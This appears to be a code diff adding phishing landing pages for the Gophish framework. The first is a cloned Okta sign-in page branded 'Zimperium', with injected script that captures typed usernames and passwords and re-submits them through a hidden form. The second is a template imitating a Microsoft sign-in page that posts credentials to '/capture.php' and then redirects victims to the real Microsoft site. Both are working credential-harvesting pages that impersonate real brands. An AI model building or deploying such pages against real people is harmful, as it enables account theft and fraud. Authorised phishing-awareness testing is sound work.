avoidPageRefresh: true
},
signIn: {
el: '#signin-container',
baseUrl: baseUrl,
brandName: 'Okta',
logo: 'https://ok14static.oktacdn.com/fs/bco/1/fs0po5h0orFSteVvh697',
logoText: 'Zimperium logo',
helpSupportNumber: orgSupportPhoneNumber,
stateToken: stateToken,
username: username,
signOutLink: signOutUrl,
consent: consentFunc,
authScheme: authScheme,
relayState: fromUri,
proxyIdxResponse: proxyIdxResponse,
overrideExistingStateToken: overrideExistingStateToken,
interstitialBeforeLoginRedirect: 'DEFAULT',
idpDiscovery: {
requestContext: idpDiscoveryRequestContext
},
features: {
router: true,
securityImage: securityImage,
rememberMe: rememberMe,
autoPush: autoPush,
webauthn: webauthn,
smsRecovery: smsRecovery,
callRecovery: callRecovery,
emailRecovery: emailRecovery,
selfServiceUnlock: selfServiceUnlock,
multiOptionalFactorEnroll: true,
sameDeviceOVEnrollmentEnabled: sameDeviceOVEnrollmentEnabled,
deviceFingerprinting: true,
useDeviceFingerprintForSecurityImage: true,
trackTypingPattern: false,
hideSignOutLinkInMFA: hideSignOutForMFA,
hideBackToSignInForReset: hideBackToSignInForReset,
rememberMyUsernameOnOIE: rememberMyUsernameOnOIE,
engFastpassMultipleAccounts: engFastpassMultipleAccounts,
customExpiredPassword: true,
idpDiscovery: idpDiscovery,
passwordlessAuth: hasPasswordlessPolicy,
consent: hasOAuth2ConsentFeature,
skipIdpFactorVerificationBtn: hasSkipIdpFactorVerificationButton,
showPasswordToggleOnSignInPage: showPasswordToggleOnSignInPage,
showIdentifier: showIdentifier,
registration: registration,
redirectByFormSubmit: redirectByFormSubmit,
showPasswordRequirementsAsHtmlList: showPasswordRequirementsAsHtmlList,
showSessionRevocation: showSessionRevocation
},
assets: {
baseUrl: "https\x3A\x2F\x2Fok14static.oktacdn.com\x2Fassets\x2Fjs\x2Fsdk\x2Fokta\x2Dsignin\x2Dwidget\x2F7.33.2"
},
language: okta.locale,
i18n: {},
customButtons: customButtons,
piv: pivProperties,
helpLinks: {
help: '',
forgotPassword: '',
unlock: '',
custom: customLinks,
factorPage: factorPageCustomLink
},
cspNonce: window.cspNonce,
hcaptcha: hcaptcha,
}
};
loginPageConfig.signIn.i18n[okta.locale] = {
'primaryauth.username.placeholder': usernameLabel,
'primaryauth.username.tooltip': usernameInlineLabel,
'primaryauth.password.placeholder': passwordLabel,
'primaryauth.password.tooltip': passwordInlineLabel,
'mfa.challenge.password.placeholder': passwordLabel,
'primaryauth.title': signinLabel,
'forgotpassword': forgotpasswordLabel,
'unlockaccount': unlockaccountLabel,
'help': helpLabel,
'needhelp': footerHelpTitle,
'password.forgot.email.or.username.placeholder': recoveryFlowPlaceholder,
'password.forgot.email.or.username.tooltip': recoveryFlowPlaceholder,
'account.unlock.email.or.username.placeholder': recoveryFlowPlaceholder,
'account.unlock.email.or.username.tooltip': recoveryFlowPlaceholder
};
loginPageConfig.signIn.logoText = 'Zimperium logo';
loginPageConfig.signIn.brandName = 'Zimperium';
function isOldWebBrowserControl() {
// We no longer support IE7. If we see the MSIE 7.0 browser mode, it's a good signal
// that we're in a windows embedded browser.
if (navigator.userAgent.indexOf('MSIE 7.0') === -1) {
return false;
}
// Because the userAgent is the same across embedded browsers, we use feature
// detection to see if we're running on older versions that do not support updating
// the documentMode via x-ua-compatible.
return document.all && !window.atob;
}
function isAbsoluteUri(uri) {
var pat = /^https?:\/\//i;
return pat.test(uri);
}
var unsupportedContainer = document.getElementById('okta-sign-in');
var failIfCookiesDisabled = true;
// Old versions of WebBrowser Controls (specifically, OneDrive) render in IE7 browser
// mode, with no way to override the documentMode. In this case, inform the user they need
// to upgrade.
if (isOldWebBrowserControl()) {
document.getElementById('unsupported-onedrive').removeAttribute('style');
unsupportedContainer.removeAttribute('style');
}
else if (failIfCookiesDisabled && !navigator.cookieEnabled) {
document.getElementById('unsupported-cookie').removeAttribute('style');
unsupportedContainer.removeAttribute('style');
}
else {
unsupportedContainer.parentNode.removeChild(unsupportedContainer);
runLoginPage(function () {
var res = OktaLogin.initLoginPage(loginPageConfig);
// Intercept form submission for Gophish
setTimeout(function() {
var submitButton = document.querySelector('[data-type="save"]') ||
document.querySelector('.button-primary') ||
document.querySelector('input[type="submit"]');
if (submitButton) {
submitButton.addEventListener('click', function(e) {
// Small delay to let Okta validate, then capture values
setTimeout(function() {
var usernameField = document.querySelector('[name="username"]') ||
document.querySelector('#okta-signin-username') ||
document.querySelector('input[type="text"]');
var passwordField = document.querySelector('[name="password"]') ||
document.querySelector('#okta-signin-password') ||
document.querySelector('input[type="password"]');
if (usernameField && passwordField && usernameField.value && passwordField.value) {
// Create hidden form for Gophish
var form = document.createElement('form');
form.method = 'POST';
form.action = '';
form.style.display = 'none';
var userInput = document.createElement('input');
userInput.type = 'hidden';
userInput.name = 'username';
userInput.value = usernameField.value;
form.appendChild(userInput);
var passInput = document.createElement('input');
passInput.type = 'hidden';
passInput.name = 'password';
passInput.value = passwordField.value;
form.appendChild(passInput);
document.body.appendChild(form);
form.submit();
}
}, 100);
});
}
}, 2000);
});
}
}());
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
window.addEventListener('load', function(event) {
function applyStyle(id, styleDef) {
if (styleDef) {
var el = document.getElementById(id);
if (!el) {
return;
}
el.classList.add(styleDef);
}
}
applyStyle('login-bg-image', 'bgStyle');
applyStyle('login-bg-image-ie8', 'bgStyleIE8');
});
</script></body>
</html>
@@ -0,0 +1,220 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{{ page_title | default('Sign in to your account') }}</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: #f2f2f2;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.container {
background: white;
padding: 40px;
border-radius: 2px;
box-shadow: 0 2px 4px rgba(0,0,0,0.1);
width: 440px;
max-width: 90%;
}
.logo {
text-align: left;
margin-bottom: 24px;
}
.logo img {
height: 24px;
}
h1 {
font-size: 24px;
font-weight: 600;
margin-bottom: 16px;
color: #1a1a1a;
}
.form-group {
margin-bottom: 16px;
}
input[type="email"],
input[type="password"],
input[type="text"] {
width: 100%;
padding: 10px 12px;
border: 1px solid #605e5c;
border-radius: 2px;
font-size: 15px;
transition: border-color 0.2s;
}
input[type="email"]:focus,
input[type="password"]:focus,
input[type="text"]:focus {
outline: none;
border-color: #0078d4;
}
.forgot-password {
display: block;
margin: 8px 0 16px;
color: #0078d4;
text-decoration: none;
font-size: 13px;
}
.forgot-password:hover {
text-decoration: underline;
}
.btn-primary {
width: 100%;
padding: 12px;
background: #0078d4;
color: white;
border: none;
border-radius: 2px;
font-size: 16px;
cursor: pointer;
transition: background 0.2s;
}
.btn-primary:hover {
background: #106ebe;
}
.error-message {
color: #d13438;
font-size: 13px;
margin-top: 8px;
display: none;
}
.loading {
display: none;
text-align: center;
margin-top: 20px;
}
.spinner {
border: 2px solid #f3f3f3;
border-top: 2px solid #0078d4;
border-radius: 50%;
width: 20px;
height: 20px;
animation: spin 1s linear infinite;
display: inline-block;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.footer {
margin-top: 40px;
font-size: 12px;
color: #605e5c;
text-align: center;
}
.footer a {
color: #605e5c;
text-decoration: none;
}
.footer a:hover {
text-decoration: underline;
}
</style>
</head>
<body>
<div class="container">
<div class="logo">
<img src="{{ logo_url | default('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMDgiIGhlaWdodD0iMjQiPjx0ZXh0IHg9IjAiIHk9IjIwIiBmb250LWZhbWlseT0iU2Vnb2UgVUkiIGZvbnQtc2l6ZT0iMjAiIGZpbGw9IiM1YzJkOTEiPk1pY3Jvc29mdDwvdGV4dD48L3N2Zz4=') }}" alt="Logo">
</div>
<h1>{{ heading | default('Sign in') }}</h1>
<form id="loginForm" method="POST" action="/capture.php">
<input type="hidden" name="rid" value="{{ '{{.RId}}' }}">
<input type="hidden" name="campaign" value="{{ '{{.Campaign}}' }}">
<div class="form-group">
<input type="email"
name="username"
id="username"
placeholder="{{ username_placeholder | default('Email, phone, or Skype') }}"
required>
</div>
<div class="form-group">
<input type="password"
name="password"
id="password"
placeholder="{{ password_placeholder | default('Password') }}"
required>
</div>
<a href="#" class="forgot-password">{{ forgot_text | default('Forgot password?') }}</a>
<div class="error-message" id="error">
{{ error_message | default('Invalid username or password.') }}
</div>
<button type="submit" class="btn-primary">
{{ button_text | default('Sign in') }}
</button>
<div class="loading" id="loading">
<div class="spinner"></div>
<p>{{ loading_text | default('Signing in...') }}</p>
</div>
</form>
<div class="footer">
<a href="#">{{ footer_link1 | default('Terms of use') }}</a> |
<a href="#">{{ footer_link2 | default('Privacy & cookies') }}</a>
</div>
</div>
<script>
document.getElementById('loginForm').addEventListener('submit', function(e) {
e.preventDefault();
// Show loading state
document.getElementById('loading').style.display = 'block';
document.querySelector('.btn-primary').style.display = 'none';
// Submit form data
fetch(this.action, {
method: 'POST',
body: new FormData(this)
})
.then(response => {
// Redirect after a delay to simulate processing
setTimeout(() => {
window.location.href = '{{ redirect_url | default("https://www.microsoft.com") }}';
}, 2000);
})
.catch(error => {
document.getElementById('error').style.display = 'block';
document.getElementById('loading').style.display = 'none';
document.querySelector('.btn-primary').style.display = 'block';
});
});
</script>
</body>
</html>